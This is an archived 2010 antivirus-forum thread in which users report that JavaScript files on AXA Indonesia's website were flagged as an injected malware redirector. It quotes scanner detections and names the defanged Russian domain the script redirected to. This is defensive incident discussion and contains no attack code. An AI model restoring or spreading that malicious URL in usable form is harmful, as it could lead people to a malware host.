Avast WEBforum

Other => Viruses and worms => Topic started by: Yanto.Chiang on June 08, 2010, 06:27:54 AM

Title: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 06:27:54 AM
Dear All,

I just got information from my friend that one of biggest financial provider AXA Financial, their website was injected with JS:Illredir-CB [Trj].
avast! was detected there is 3 location was infected :

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/DropDownMenuX.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/ie5.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary website scanning tool, this website got suspicious category :

http://www.unmaskparasites.com/security-report/


I need to know where is the exactly location at their HTML script was injected?


Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Pondus on June 08, 2010, 07:38:20 AM
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

VirusTotal -  axa.co.id.htm - 8/41
http://www.virustotal.com/analisis/40f5bf00aacfa11860323a34260abea575772d3d292afaafe53d589f1f65337d-1275988821
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 07:41:12 AM
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

Hi Pondus,

Yes you are rite, i just would like to know which part of this website was injected with the script.

cheers,
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Pondus on June 08, 2010, 07:43:38 AM
not sure, but DavidR or Polonus will tell you when they arrive
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 07:50:36 AM
not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kindly advice,

I need this because if i can contact their web administrator it would be helpful for them.

Since they are core business in financial transaction, i am afraid it would be harmful for other client which related with AXA Financial.

cheers,
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 09:18:20 AM

According to Wepawet, at this website found nothing harmful script :

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: kubecj on June 08, 2010, 12:08:48 PM
Definitely malware redirector. Wepawet does even find the russian link, but it's down.
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 02:11:52 PM
Hi Kubejc,

Thanks for your kindly information and advice.

cheers,
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: polonus on June 08, 2010, 02:48:27 PM
Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through, suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here:  hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 03:08:27 PM
Hi Polonus,

I am sorry for inconvenience causes, but i already fixed it.

By the way, do you know how to trace the location of those scripts?

Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: polonus on June 08, 2010, 08:17:08 PM
Hi Yanto.Chiang,

I PM-ed you with extensive instructions how to do this safely and securely,
good hunt,

polonus